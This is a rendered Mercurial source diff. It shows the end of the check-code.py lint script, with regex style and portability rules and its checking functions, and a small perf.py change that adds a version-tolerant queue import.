334 (r'\bdef\s+__bool__\b', "__bool__ should be __nonzero__ in Python 2"),
335 (r'os\.path\.join\(.*, *(""|\'\')\)',
335 (r'os\.path\.join\(.*, *(""|\'\')\)',
336 "use pathutil.normasprefix(path) instead of os.path.join(path, '')"),
336 "use pathutil.normasprefix(path) instead of os.path.join(path, '')"),
337 (r'\s0[0-7]+\b', 'legacy octal syntax; use "0o" prefix instead of "0"'),
337 (r'\s0[0-7]+\b', 'legacy octal syntax; use "0o" prefix instead of "0"'),
338 # XXX only catch mutable arguments on the first line of the definition
338 # XXX only catch mutable arguments on the first line of the definition
339 (r'def.*[( ]\w+=\{\}', "don't use mutable default arguments"),
339 (r'def.*[( ]\w+=\{\}', "don't use mutable default arguments"),
340 (r'\butil\.Abort\b', "directly use error.Abort"),
340 (r'\butil\.Abort\b', "directly use error.Abort"),
341 (r'^@(\w*\.)?cachefunc', "module-level @cachefunc is risky, please avoid"),
341 (r'^@(\w*\.)?cachefunc', "module-level @cachefunc is risky, please avoid"),
342 (r'^import atexit', "don't use atexit, use ui.atexit"),
342 (r'^import atexit', "don't use atexit, use ui.atexit"),
343 (r'^import Queue', "don't use Queue, use util.queue + util.empty"),
343 (r'^import Queue', "don't use Queue, use pycompat.queue.Queue + "
344 "pycompat.queue.Empty"),
344 (r'^import cStringIO', "don't use cStringIO.StringIO, use util.stringio"),
345 (r'^import cStringIO', "don't use cStringIO.StringIO, use util.stringio"),
345 (r'^import urllib', "don't use urllib, use util.urlreq/util.urlerr"),
346 (r'^import urllib', "don't use urllib, use util.urlreq/util.urlerr"),
346 (r'^import SocketServer', "don't use SockerServer, use util.socketserver"),
347 (r'^import SocketServer', "don't use SockerServer, use util.socketserver"),
347 (r'^import urlparse', "don't use urlparse, use util.urlreq"),
348 (r'^import urlparse', "don't use urlparse, use util.urlreq"),
348 (r'^import xmlrpclib', "don't use xmlrpclib, use util.xmlrpclib"),
349 (r'^import xmlrpclib', "don't use xmlrpclib, use util.xmlrpclib"),
349 (r'^import cPickle', "don't use cPickle, use util.pickle"),
350 (r'^import cPickle', "don't use cPickle, use util.pickle"),
350 (r'^import pickle', "don't use pickle, use util.pickle"),
351 (r'^import pickle', "don't use pickle, use util.pickle"),
351 (r'^import httplib', "don't use httplib, use util.httplib"),
352 (r'^import httplib', "don't use httplib, use util.httplib"),
352 (r'^import BaseHTTPServer', "use util.httpserver instead"),
353 (r'^import BaseHTTPServer', "use util.httpserver instead"),
353 (r'^(from|import) mercurial\.(cext|pure|cffi)',
354 (r'^(from|import) mercurial\.(cext|pure|cffi)',
354 "use mercurial.policy.importmod instead"),
355 "use mercurial.policy.importmod instead"),
355 (r'\.next\(\)', "don't use .next(), use next(...)"),
356 (r'\.next\(\)', "don't use .next(), use next(...)"),
356 (r'([a-z]*).revision\(\1\.node\(',
357 (r'([a-z]*).revision\(\1\.node\(',
357 "don't convert rev to node before passing to revision(nodeorrev)"),
358 "don't convert rev to node before passing to revision(nodeorrev)"),
358 (r'platform\.system\(\)', "don't use platform.system(), use pycompat"),
359 (r'platform\.system\(\)', "don't use platform.system(), use pycompat"),
359
360
360 # rules depending on implementation of repquote()
361 # rules depending on implementation of repquote()
361 (r' x+[xpqo%APM][\'"]\n\s+[\'"]x',
362 (r' x+[xpqo%APM][\'"]\n\s+[\'"]x',
362 'string join across lines with no space'),
363 'string join across lines with no space'),
363 (r'''(?x)ui\.(status|progress|write|note|warn)\(
364 (r'''(?x)ui\.(status|progress|write|note|warn)\(
364 [ \t\n#]*
365 [ \t\n#]*
365 (?# any strings/comments might precede a string, which
366 (?# any strings/comments might precede a string, which
366 # contains translatable message)
367 # contains translatable message)
367 ((['"]|\'\'\'|""")[ \npq%bAPMxno]*(['"]|\'\'\'|""")[ \t\n#]+)*
368 ((['"]|\'\'\'|""")[ \npq%bAPMxno]*(['"]|\'\'\'|""")[ \t\n#]+)*
368 (?# sequence consisting of below might precede translatable message
369 (?# sequence consisting of below might precede translatable message
369 # - formatting string: "% 10s", "%05d", "% -3.2f", "%*s", "%%" ...
370 # - formatting string: "% 10s", "%05d", "% -3.2f", "%*s", "%%" ...
370 # - escaped character: "\\", "\n", "\0" ...
371 # - escaped character: "\\", "\n", "\0" ...
371 # - character other than '%', 'b' as '\', and 'x' as alphabet)
372 # - character other than '%', 'b' as '\', and 'x' as alphabet)
372 (['"]|\'\'\'|""")
373 (['"]|\'\'\'|""")
373 ((%([ n]?[PM]?([np]+|A))?x)|%%|b[bnx]|[ \nnpqAPMo])*x
374 ((%([ n]?[PM]?([np]+|A))?x)|%%|b[bnx]|[ \nnpqAPMo])*x
374 (?# this regexp can't use [^...] style,
375 (?# this regexp can't use [^...] style,
375 # because _preparepats forcibly adds "\n" into [^...],
376 # because _preparepats forcibly adds "\n" into [^...],
376 # even though this regexp wants match it against "\n")''',
377 # even though this regexp wants match it against "\n")''',
377 "missing _() in ui message (use () to hide false-positives)"),
378 "missing _() in ui message (use () to hide false-positives)"),
378 ],
379 ],
379 # warnings
380 # warnings
380 [
381 [
381 # rules depending on implementation of repquote()
382 # rules depending on implementation of repquote()
382 (r'(^| )pp +xxxxqq[ \n][^\n]', "add two newlines after '.. note::'"),
383 (r'(^| )pp +xxxxqq[ \n][^\n]', "add two newlines after '.. note::'"),
383 ]
384 ]
384 ]
385 ]
385
386
386 pyfilters = [
387 pyfilters = [
387 (r"""(?msx)(?P<comment>\#.*?$)|
388 (r"""(?msx)(?P<comment>\#.*?$)|
388 ((?P<quote>('''|\"\"\"|(?<!')'(?!')|(?<!")"(?!")))
389 ((?P<quote>('''|\"\"\"|(?<!')'(?!')|(?<!")"(?!")))
389 (?P<text>(([^\\]|\\.)*?))
390 (?P<text>(([^\\]|\\.)*?))
390 (?P=quote))""", reppython),
391 (?P=quote))""", reppython),
391 ]
392 ]
392
393
393 # non-filter patterns
394 # non-filter patterns
394 pynfpats = [
395 pynfpats = [
395 [
396 [
396 (r'pycompat\.osname\s*[=!]=\s*[\'"]nt[\'"]', "use pycompat.iswindows"),
397 (r'pycompat\.osname\s*[=!]=\s*[\'"]nt[\'"]', "use pycompat.iswindows"),
397 (r'pycompat\.osname\s*[=!]=\s*[\'"]posix[\'"]', "use pycompat.isposix"),
398 (r'pycompat\.osname\s*[=!]=\s*[\'"]posix[\'"]', "use pycompat.isposix"),
398 (r'pycompat\.sysplatform\s*[!=]=\s*[\'"]darwin[\'"]',
399 (r'pycompat\.sysplatform\s*[!=]=\s*[\'"]darwin[\'"]',
399 "use pycompat.isdarwin"),
400 "use pycompat.isdarwin"),
400 ],
401 ],
401 # warnings
402 # warnings
402 [],
403 [],
403 ]
404 ]
404
405
405 # extension non-filter patterns
406 # extension non-filter patterns
406 pyextnfpats = [
407 pyextnfpats = [
407 [(r'^"""\n?[A-Z]', "don't capitalize docstring title")],
408 [(r'^"""\n?[A-Z]', "don't capitalize docstring title")],
408 # warnings
409 # warnings
409 [],
410 [],
410 ]
411 ]
411
412
412 txtfilters = []
413 txtfilters = []
413
414
414 txtpats = [
415 txtpats = [
415 [
416 [
416 ('\s$', 'trailing whitespace'),
417 ('\s$', 'trailing whitespace'),
417 ('.. note::[ \n][^\n]', 'add two newlines after note::')
418 ('.. note::[ \n][^\n]', 'add two newlines after note::')
418 ],
419 ],
419 []
420 []
420 ]
421 ]
421
422
422 cpats = [
423 cpats = [
423 [
424 [
424 (r'//', "don't use //-style comments"),
425 (r'//', "don't use //-style comments"),
425 (r'\S\t', "don't use tabs except for indent"),
426 (r'\S\t', "don't use tabs except for indent"),
426 (r'(\S[ \t]+|^[ \t]+)\n', "trailing whitespace"),
427 (r'(\S[ \t]+|^[ \t]+)\n', "trailing whitespace"),
427 (r'.{81}', "line too long"),
428 (r'.{81}', "line too long"),
428 (r'(while|if|do|for)\(', "use space after while/if/do/for"),
429 (r'(while|if|do|for)\(', "use space after while/if/do/for"),
429 (r'return\(', "return is not a function"),
430 (r'return\(', "return is not a function"),
430 (r' ;', "no space before ;"),
431 (r' ;', "no space before ;"),
431 (r'[^;] \)', "no space before )"),
432 (r'[^;] \)', "no space before )"),
432 (r'[)][{]', "space between ) and {"),
433 (r'[)][{]', "space between ) and {"),
433 (r'\w+\* \w+', "use int *foo, not int* foo"),
434 (r'\w+\* \w+', "use int *foo, not int* foo"),
434 (r'\W\([^\)]+\) \w+', "use (int)foo, not (int) foo"),
435 (r'\W\([^\)]+\) \w+', "use (int)foo, not (int) foo"),
435 (r'\w+ (\+\+|--)', "use foo++, not foo ++"),
436 (r'\w+ (\+\+|--)', "use foo++, not foo ++"),
436 (r'\w,\w', "missing whitespace after ,"),
437 (r'\w,\w', "missing whitespace after ,"),
437 (r'^[^#]\w[+/*]\w', "missing whitespace in expression"),
438 (r'^[^#]\w[+/*]\w', "missing whitespace in expression"),
438 (r'\w\s=\s\s+\w', "gratuitous whitespace after ="),
439 (r'\w\s=\s\s+\w', "gratuitous whitespace after ="),
439 (r'^#\s+\w', "use #foo, not # foo"),
440 (r'^#\s+\w', "use #foo, not # foo"),
440 (r'[^\n]\Z', "no trailing newline"),
441 (r'[^\n]\Z', "no trailing newline"),
441 (r'^\s*#import\b', "use only #include in standard C code"),
442 (r'^\s*#import\b', "use only #include in standard C code"),
442 (r'strcpy\(', "don't use strcpy, use strlcpy or memcpy"),
443 (r'strcpy\(', "don't use strcpy, use strlcpy or memcpy"),
443 (r'strcat\(', "don't use strcat"),
444 (r'strcat\(', "don't use strcat"),
444
445
445 # rules depending on implementation of repquote()
446 # rules depending on implementation of repquote()
446 ],
447 ],
447 # warnings
448 # warnings
448 [
449 [
449 # rules depending on implementation of repquote()
450 # rules depending on implementation of repquote()
450 ]
451 ]
451 ]
452 ]
452
453
453 cfilters = [
454 cfilters = [
454 (r'(/\*)(((\*(?!/))|[^*])*)\*/', repccomment),
455 (r'(/\*)(((\*(?!/))|[^*])*)\*/', repccomment),
455 (r'''(?P<quote>(?<!")")(?P<text>([^"]|\\")+)"(?!")''', repquote),
456 (r'''(?P<quote>(?<!")")(?P<text>([^"]|\\")+)"(?!")''', repquote),
456 (r'''(#\s*include\s+<)([^>]+)>''', repinclude),
457 (r'''(#\s*include\s+<)([^>]+)>''', repinclude),
457 (r'(\()([^)]+\))', repcallspaces),
458 (r'(\()([^)]+\))', repcallspaces),
458 ]
459 ]
459
460
460 inutilpats = [
461 inutilpats = [
461 [
462 [
462 (r'\bui\.', "don't use ui in util"),
463 (r'\bui\.', "don't use ui in util"),
463 ],
464 ],
464 # warnings
465 # warnings
465 []
466 []
466 ]
467 ]
467
468
468 inrevlogpats = [
469 inrevlogpats = [
469 [
470 [
470 (r'\brepo\.', "don't use repo in revlog"),
471 (r'\brepo\.', "don't use repo in revlog"),
471 ],
472 ],
472 # warnings
473 # warnings
473 []
474 []
474 ]
475 ]
475
476
476 webtemplatefilters = []
477 webtemplatefilters = []
477
478
478 webtemplatepats = [
479 webtemplatepats = [
479 [],
480 [],
480 [
481 [
481 (r'{desc(\|(?!websub|firstline)[^\|]*)+}',
482 (r'{desc(\|(?!websub|firstline)[^\|]*)+}',
482 'follow desc keyword with either firstline or websub'),
483 'follow desc keyword with either firstline or websub'),
483 ]
484 ]
484 ]
485 ]
485
486
486 allfilesfilters = []
487 allfilesfilters = []
487
488
488 allfilespats = [
489 allfilespats = [
489 [
490 [
490 (r'(http|https)://[a-zA-Z0-9./]*selenic.com/',
491 (r'(http|https)://[a-zA-Z0-9./]*selenic.com/',
491 'use mercurial-scm.org domain URL'),
492 'use mercurial-scm.org domain URL'),
492 (r'mercurial@selenic\.com',
493 (r'mercurial@selenic\.com',
493 'use mercurial-scm.org domain for mercurial ML address'),
494 'use mercurial-scm.org domain for mercurial ML address'),
494 (r'mercurial-devel@selenic\.com',
495 (r'mercurial-devel@selenic\.com',
495 'use mercurial-scm.org domain for mercurial-devel ML address'),
496 'use mercurial-scm.org domain for mercurial-devel ML address'),
496 ],
497 ],
497 # warnings
498 # warnings
498 [],
499 [],
499 ]
500 ]
500
501
501 py3pats = [
502 py3pats = [
502 [
503 [
503 (r'os\.environ', "use encoding.environ instead (py3)", r'#.*re-exports'),
504 (r'os\.environ', "use encoding.environ instead (py3)", r'#.*re-exports'),
504 (r'os\.name', "use pycompat.osname instead (py3)"),
505 (r'os\.name', "use pycompat.osname instead (py3)"),
505 (r'os\.getcwd', "use pycompat.getcwd instead (py3)"),
506 (r'os\.getcwd', "use pycompat.getcwd instead (py3)"),
506 (r'os\.sep', "use pycompat.ossep instead (py3)"),
507 (r'os\.sep', "use pycompat.ossep instead (py3)"),
507 (r'os\.pathsep', "use pycompat.ospathsep instead (py3)"),
508 (r'os\.pathsep', "use pycompat.ospathsep instead (py3)"),
508 (r'os\.altsep', "use pycompat.osaltsep instead (py3)"),
509 (r'os\.altsep', "use pycompat.osaltsep instead (py3)"),
509 (r'sys\.platform', "use pycompat.sysplatform instead (py3)"),
510 (r'sys\.platform', "use pycompat.sysplatform instead (py3)"),
510 (r'getopt\.getopt', "use pycompat.getoptb instead (py3)"),
511 (r'getopt\.getopt', "use pycompat.getoptb instead (py3)"),
511 (r'os\.getenv', "use encoding.environ.get instead"),
512 (r'os\.getenv', "use encoding.environ.get instead"),
512 (r'os\.setenv', "modifying the environ dict is not preferred"),
513 (r'os\.setenv', "modifying the environ dict is not preferred"),
513 ],
514 ],
514 # warnings
515 # warnings
515 [],
516 [],
516 ]
517 ]
517
518
518 checks = [
519 checks = [
519 ('python', r'.*\.(py|cgi)$', r'^#!.*python', pyfilters, pypats),
520 ('python', r'.*\.(py|cgi)$', r'^#!.*python', pyfilters, pypats),
520 ('python', r'.*\.(py|cgi)$', r'^#!.*python', [], pynfpats),
521 ('python', r'.*\.(py|cgi)$', r'^#!.*python', [], pynfpats),
521 ('python', r'.*hgext.*\.py$', '', [], pyextnfpats),
522 ('python', r'.*hgext.*\.py$', '', [], pyextnfpats),
522 ('python 3', r'.*(hgext|mercurial)/(?!demandimport|policy|pycompat).*\.py',
523 ('python 3', r'.*(hgext|mercurial)/(?!demandimport|policy|pycompat).*\.py',
523 '', pyfilters, py3pats),
524 '', pyfilters, py3pats),
524 ('test script', r'(.*/)?test-[^.~]*$', '', testfilters, testpats),
525 ('test script', r'(.*/)?test-[^.~]*$', '', testfilters, testpats),
525 ('c', r'.*\.[ch]$', '', cfilters, cpats),
526 ('c', r'.*\.[ch]$', '', cfilters, cpats),
526 ('unified test', r'.*\.t$', '', utestfilters, utestpats),
527 ('unified test', r'.*\.t$', '', utestfilters, utestpats),
527 ('layering violation repo in revlog', r'mercurial/revlog\.py', '',
528 ('layering violation repo in revlog', r'mercurial/revlog\.py', '',
528 pyfilters, inrevlogpats),
529 pyfilters, inrevlogpats),
529 ('layering violation ui in util', r'mercurial/util\.py', '', pyfilters,
530 ('layering violation ui in util', r'mercurial/util\.py', '', pyfilters,
530 inutilpats),
531 inutilpats),
531 ('txt', r'.*\.txt$', '', txtfilters, txtpats),
532 ('txt', r'.*\.txt$', '', txtfilters, txtpats),
532 ('web template', r'mercurial/templates/.*\.tmpl', '',
533 ('web template', r'mercurial/templates/.*\.tmpl', '',
533 webtemplatefilters, webtemplatepats),
534 webtemplatefilters, webtemplatepats),
534 ('all except for .po', r'.*(?<!\.po)$', '',
535 ('all except for .po', r'.*(?<!\.po)$', '',
535 allfilesfilters, allfilespats),
536 allfilesfilters, allfilespats),
536 ]
537 ]
537
538
538 def _preparepats():
539 def _preparepats():
539 for c in checks:
540 for c in checks:
540 failandwarn = c[-1]
541 failandwarn = c[-1]
541 for pats in failandwarn:
542 for pats in failandwarn:
542 for i, pseq in enumerate(pats):
543 for i, pseq in enumerate(pats):
543 # fix-up regexes for multi-line searches
544 # fix-up regexes for multi-line searches
544 p = pseq[0]
545 p = pseq[0]
545 # \s doesn't match \n (done in two steps)
546 # \s doesn't match \n (done in two steps)
546 # first, we replace \s that appears in a set already
547 # first, we replace \s that appears in a set already
547 p = re.sub(r'\[\\s', r'[ \\t', p)
548 p = re.sub(r'\[\\s', r'[ \\t', p)
548 # now we replace other \s instances.
549 # now we replace other \s instances.
549 p = re.sub(r'(?<!(\\|\[))\\s', r'[ \\t]', p)
550 p = re.sub(r'(?<!(\\|\[))\\s', r'[ \\t]', p)
550 # [^...] doesn't match newline
551 # [^...] doesn't match newline
551 p = re.sub(r'(?<!\\)\[\^', r'[^\\n', p)
552 p = re.sub(r'(?<!\\)\[\^', r'[^\\n', p)
552
553
553 pats[i] = (re.compile(p, re.MULTILINE),) + pseq[1:]
554 pats[i] = (re.compile(p, re.MULTILINE),) + pseq[1:]
554 filters = c[3]
555 filters = c[3]
555 for i, flt in enumerate(filters):
556 for i, flt in enumerate(filters):
556 filters[i] = re.compile(flt[0]), flt[1]
557 filters[i] = re.compile(flt[0]), flt[1]
557
558
558 class norepeatlogger(object):
559 class norepeatlogger(object):
559 def __init__(self):
560 def __init__(self):
560 self._lastseen = None
561 self._lastseen = None
561
562
562 def log(self, fname, lineno, line, msg, blame):
563 def log(self, fname, lineno, line, msg, blame):
563 """print error related a to given line of a given file.
564 """print error related a to given line of a given file.
564
565
565 The faulty line will also be printed but only once in the case
566 The faulty line will also be printed but only once in the case
566 of multiple errors.
567 of multiple errors.
567
568
568 :fname: filename
569 :fname: filename
569 :lineno: line number
570 :lineno: line number
570 :line: actual content of the line
571 :line: actual content of the line
571 :msg: error message
572 :msg: error message
572 """
573 """
573 msgid = fname, lineno, line
574 msgid = fname, lineno, line
574 if msgid != self._lastseen:
575 if msgid != self._lastseen:
575 if blame:
576 if blame:
576 print("%s:%d (%s):" % (fname, lineno, blame))
577 print("%s:%d (%s):" % (fname, lineno, blame))
577 else:
578 else:
578 print("%s:%d:" % (fname, lineno))
579 print("%s:%d:" % (fname, lineno))
579 print(" > %s" % line)
580 print(" > %s" % line)
580 self._lastseen = msgid
581 self._lastseen = msgid
581 print(" " + msg)
582 print(" " + msg)
582
583
583 _defaultlogger = norepeatlogger()
584 _defaultlogger = norepeatlogger()
584
585
585 def getblame(f):
586 def getblame(f):
586 lines = []
587 lines = []
587 for l in os.popen('hg annotate -un %s' % f):
588 for l in os.popen('hg annotate -un %s' % f):
588 start, line = l.split(':', 1)
589 start, line = l.split(':', 1)
589 user, rev = start.split()
590 user, rev = start.split()
590 lines.append((line[1:-1], user, rev))
591 lines.append((line[1:-1], user, rev))
591 return lines
592 return lines
592
593
593 def checkfile(f, logfunc=_defaultlogger.log, maxerr=None, warnings=False,
594 def checkfile(f, logfunc=_defaultlogger.log, maxerr=None, warnings=False,
594 blame=False, debug=False, lineno=True):
595 blame=False, debug=False, lineno=True):
595 """checks style and portability of a given file
596 """checks style and portability of a given file
596
597
597 :f: filepath
598 :f: filepath
598 :logfunc: function used to report error
599 :logfunc: function used to report error
599 logfunc(filename, linenumber, linecontent, errormessage)
600 logfunc(filename, linenumber, linecontent, errormessage)
600 :maxerr: number of error to display before aborting.
601 :maxerr: number of error to display before aborting.
601 Set to false (default) to report all errors
602 Set to false (default) to report all errors
602
603
603 return True if no error is found, False otherwise.
604 return True if no error is found, False otherwise.
604 """
605 """
605 blamecache = None
606 blamecache = None
606 result = True
607 result = True
607
608
608 try:
609 try:
609 with opentext(f) as fp:
610 with opentext(f) as fp:
610 try:
611 try:
611 pre = post = fp.read()
612 pre = post = fp.read()
612 except UnicodeDecodeError as e:
613 except UnicodeDecodeError as e:
613 print("%s while reading %s" % (e, f))
614 print("%s while reading %s" % (e, f))
614 return result
615 return result
615 except IOError as e:
616 except IOError as e:
616 print("Skipping %s, %s" % (f, str(e).split(':', 1)[0]))
617 print("Skipping %s, %s" % (f, str(e).split(':', 1)[0]))
617 return result
618 return result
618
619
619 for name, match, magic, filters, pats in checks:
620 for name, match, magic, filters, pats in checks:
620 post = pre # discard filtering result of previous check
621 post = pre # discard filtering result of previous check
621 if debug:
622 if debug:
622 print(name, f)
623 print(name, f)
623 fc = 0
624 fc = 0
624 if not (re.match(match, f) or (magic and re.search(magic, pre))):
625 if not (re.match(match, f) or (magic and re.search(magic, pre))):
625 if debug:
626 if debug:
626 print("Skipping %s for %s it doesn't match %s" % (
627 print("Skipping %s for %s it doesn't match %s" % (
627 name, match, f))
628 name, match, f))
628 continue
629 continue
629 if "no-" "check-code" in pre:
630 if "no-" "check-code" in pre:
630 # If you're looking at this line, it's because a file has:
631 # If you're looking at this line, it's because a file has:
631 # no- check- code
632 # no- check- code
632 # but the reason to output skipping is to make life for
633 # but the reason to output skipping is to make life for
633 # tests easier. So, instead of writing it with a normal
634 # tests easier. So, instead of writing it with a normal
634 # spelling, we write it with the expected spelling from
635 # spelling, we write it with the expected spelling from
635 # tests/test-check-code.t
636 # tests/test-check-code.t
636 print("Skipping %s it has no-che?k-code (glob)" % f)
637 print("Skipping %s it has no-che?k-code (glob)" % f)
637 return "Skip" # skip checking this file
638 return "Skip" # skip checking this file
638 for p, r in filters:
639 for p, r in filters:
639 post = re.sub(p, r, post)
640 post = re.sub(p, r, post)
640 nerrs = len(pats[0]) # nerr elements are errors
641 nerrs = len(pats[0]) # nerr elements are errors
641 if warnings:
642 if warnings:
642 pats = pats[0] + pats[1]
643 pats = pats[0] + pats[1]
643 else:
644 else:
644 pats = pats[0]
645 pats = pats[0]
645 # print post # uncomment to show filtered version
646 # print post # uncomment to show filtered version
646
647
647 if debug:
648 if debug:
648 print("Checking %s for %s" % (name, f))
649 print("Checking %s for %s" % (name, f))
649
650
650 prelines = None
651 prelines = None
651 errors = []
652 errors = []
652 for i, pat in enumerate(pats):
653 for i, pat in enumerate(pats):
653 if len(pat) == 3:
654 if len(pat) == 3:
654 p, msg, ignore = pat
655 p, msg, ignore = pat
655 else:
656 else:
656 p, msg = pat
657 p, msg = pat
657 ignore = None
658 ignore = None
658 if i >= nerrs:
659 if i >= nerrs:
659 msg = "warning: " + msg
660 msg = "warning: " + msg
660
661
661 pos = 0
662 pos = 0
662 n = 0
663 n = 0
663 for m in p.finditer(post):
664 for m in p.finditer(post):
664 if prelines is None:
665 if prelines is None:
665 prelines = pre.splitlines()
666 prelines = pre.splitlines()
666 postlines = post.splitlines(True)
667 postlines = post.splitlines(True)
667
668
668 start = m.start()
669 start = m.start()
669 while n < len(postlines):
670 while n < len(postlines):
670 step = len(postlines[n])
671 step = len(postlines[n])
671 if pos + step > start:
672 if pos + step > start:
672 break
673 break
673 pos += step
674 pos += step
674 n += 1
675 n += 1
675 l = prelines[n]
676 l = prelines[n]
676
677
677 if ignore and re.search(ignore, l, re.MULTILINE):
678 if ignore and re.search(ignore, l, re.MULTILINE):
678 if debug:
679 if debug:
679 print("Skipping %s for %s:%s (ignore pattern)" % (
680 print("Skipping %s for %s:%s (ignore pattern)" % (
680 name, f, n))
681 name, f, n))
681 continue
682 continue
682 bd = ""
683 bd = ""
683 if blame:
684 if blame:
684 bd = 'working directory'
685 bd = 'working directory'
685 if not blamecache:
686 if not blamecache:
686 blamecache = getblame(f)
687 blamecache = getblame(f)
687 if n < len(blamecache):
688 if n < len(blamecache):
688 bl, bu, br = blamecache[n]
689 bl, bu, br = blamecache[n]
689 if bl == l:
690 if bl == l:
690 bd = '%s@%s' % (bu, br)
691 bd = '%s@%s' % (bu, br)
691
692
692 errors.append((f, lineno and n + 1, l, msg, bd))
693 errors.append((f, lineno and n + 1, l, msg, bd))
693 result = False
694 result = False
694
695
695 errors.sort()
696 errors.sort()
696 for e in errors:
697 for e in errors:
697 logfunc(*e)
698 logfunc(*e)
698 fc += 1
699 fc += 1
699 if maxerr and fc >= maxerr:
700 if maxerr and fc >= maxerr:
700 print(" (too many errors, giving up)")
701 print(" (too many errors, giving up)")
701 break
702 break
702
703
703 return result
704 return result
704
705
705 def main():
706 def main():
706 parser = optparse.OptionParser("%prog [options] [files | -]")
707 parser = optparse.OptionParser("%prog [options] [files | -]")
707 parser.add_option("-w", "--warnings", action="store_true",
708 parser.add_option("-w", "--warnings", action="store_true",
708 help="include warning-level checks")
709 help="include warning-level checks")
709 parser.add_option("-p", "--per-file", type="int",
710 parser.add_option("-p", "--per-file", type="int",
710 help="max warnings per file")
711 help="max warnings per file")
711 parser.add_option("-b", "--blame", action="store_true",
712 parser.add_option("-b", "--blame", action="store_true",
712 help="use annotate to generate blame info")
713 help="use annotate to generate blame info")
713 parser.add_option("", "--debug", action="store_true",
714 parser.add_option("", "--debug", action="store_true",
714 help="show debug information")
715 help="show debug information")
715 parser.add_option("", "--nolineno", action="store_false",
716 parser.add_option("", "--nolineno", action="store_false",
716 dest='lineno', help="don't show line numbers")
717 dest='lineno', help="don't show line numbers")
717
718
718 parser.set_defaults(per_file=15, warnings=False, blame=False, debug=False,
719 parser.set_defaults(per_file=15, warnings=False, blame=False, debug=False,
719 lineno=True)
720 lineno=True)
720 (options, args) = parser.parse_args()
721 (options, args) = parser.parse_args()
721
722
722 if len(args) == 0:
723 if len(args) == 0:
723 check = glob.glob("*")
724 check = glob.glob("*")
724 elif args == ['-']:
725 elif args == ['-']:
725 # read file list from stdin
726 # read file list from stdin
726 check = sys.stdin.read().splitlines()
727 check = sys.stdin.read().splitlines()
727 else:
728 else:
728 check = args
729 check = args
729
730
730 _preparepats()
731 _preparepats()
731
732
732 ret = 0
733 ret = 0
733 for f in check:
734 for f in check:
734 if not checkfile(f, maxerr=options.per_file, warnings=options.warnings,
735 if not checkfile(f, maxerr=options.per_file, warnings=options.warnings,
735 blame=options.blame, debug=options.debug,
736 blame=options.blame, debug=options.debug,
736 lineno=options.lineno):
737 lineno=options.lineno):
737 ret = 1
738 ret = 1
738 return ret
739 return ret
739
740
740 if __name__ == "__main__":
741 if __name__ == "__main__":
741 sys.exit(main())
742 sys.exit(main())
@@ -1,1764 +1,1774 b''
1 # perf.py - performance test routines
1 # perf.py - performance test routines
2 '''helper extension to measure performance'''
2 '''helper extension to measure performance'''
3
3
4 # "historical portability" policy of perf.py:
4 # "historical portability" policy of perf.py:
5 #
5 #
6 # We have to do:
6 # We have to do:
7 # - make perf.py "loadable" with as wide Mercurial version as possible
7 # - make perf.py "loadable" with as wide Mercurial version as possible
8 # This doesn't mean that perf commands work correctly with that Mercurial.
8 # This doesn't mean that perf commands work correctly with that Mercurial.
9 # BTW, perf.py itself has been available since 1.1 (or eb240755386d).
9 # BTW, perf.py itself has been available since 1.1 (or eb240755386d).
10 # - make historical perf command work correctly with as wide Mercurial
10 # - make historical perf command work correctly with as wide Mercurial
11 # version as possible
11 # version as possible
12 #
12 #
13 # We have to do, if possible with reasonable cost:
13 # We have to do, if possible with reasonable cost:
14 # - make recent perf command for historical feature work correctly
14 # - make recent perf command for historical feature work correctly
15 # with early Mercurial
15 # with early Mercurial
16 #
16 #
17 # We don't have to do:
17 # We don't have to do:
18 # - make perf command for recent feature work correctly with early
18 # - make perf command for recent feature work correctly with early
19 # Mercurial
19 # Mercurial
20
20
21 from __future__ import absolute_import
21 from __future__ import absolute_import
22 import functools
22 import functools
23 import gc
23 import gc
24 import os
24 import os
25 import random
25 import random
26 import struct
26 import struct
27 import sys
27 import sys
28 import threading
28 import threading
29 import time
29 import time
30 from mercurial import (
30 from mercurial import (
31 changegroup,
31 changegroup,
32 cmdutil,
32 cmdutil,
33 commands,
33 commands,
34 copies,
34 copies,
35 error,
35 error,
36 extensions,
36 extensions,
37 mdiff,
37 mdiff,
38 merge,
38 merge,
39 revlog,
39 revlog,
40 util,
40 util,
41 )
41 )
42
42
43 # for "historical portability":
43 # for "historical portability":
44 # try to import modules separately (in dict order), and ignore
44 # try to import modules separately (in dict order), and ignore
45 # failure, because these aren't available with early Mercurial
45 # failure, because these aren't available with early Mercurial
46 try:
46 try:
47 from mercurial import branchmap # since 2.5 (or bcee63733aad)
47 from mercurial import branchmap # since 2.5 (or bcee63733aad)
48 except ImportError:
48 except ImportError:
49 pass
49 pass
50 try:
50 try:
51 from mercurial import obsolete # since 2.3 (or ad0d6c2b3279)
51 from mercurial import obsolete # since 2.3 (or ad0d6c2b3279)
52 except ImportError:
52 except ImportError:
53 pass
53 pass
54 try:
54 try:
55 from mercurial import registrar # since 3.7 (or 37d50250b696)
55 from mercurial import registrar # since 3.7 (or 37d50250b696)
56 dir(registrar) # forcibly load it
56 dir(registrar) # forcibly load it
57 except ImportError:
57 except ImportError:
58 registrar = None
58 registrar = None
59 try:
59 try:
60 from mercurial import repoview # since 2.5 (or 3a6ddacb7198)
60 from mercurial import repoview # since 2.5 (or 3a6ddacb7198)
61 except ImportError:
61 except ImportError:
62 pass
62 pass
63 try:
63 try:
64 from mercurial import scmutil # since 1.9 (or 8b252e826c68)
64 from mercurial import scmutil # since 1.9 (or 8b252e826c68)
65 except ImportError:
65 except ImportError:
66 pass
66 pass
67 try:
67 try:
68 from mercurial import pycompat
68 from mercurial import pycompat
69 getargspec = pycompat.getargspec # added to module after 4.5
69 getargspec = pycompat.getargspec # added to module after 4.5
70 except (ImportError, AttributeError):
70 except (ImportError, AttributeError):
71 import inspect
71 import inspect
72 getargspec = inspect.getargspec
72 getargspec = inspect.getargspec
73
73
74 try:
75 # 4.7+
76 queue = pycompat.queue.Queue
77 except (AttributeError, ImportError):
78 # <4.7.
79 try:
80 queue = pycompat.queue
81 except (AttributeError, ImportError):
82 queue = util.queue
83
74 # for "historical portability":
84 # for "historical portability":
75 # define util.safehasattr forcibly, because util.safehasattr has been
85 # define util.safehasattr forcibly, because util.safehasattr has been
76 # available since 1.9.3 (or 94b200a11cf7)
86 # available since 1.9.3 (or 94b200a11cf7)
77 _undefined = object()
87 _undefined = object()
78 def safehasattr(thing, attr):
88 def safehasattr(thing, attr):
79 return getattr(thing, attr, _undefined) is not _undefined
89 return getattr(thing, attr, _undefined) is not _undefined
80 setattr(util, 'safehasattr', safehasattr)
90 setattr(util, 'safehasattr', safehasattr)
81
91
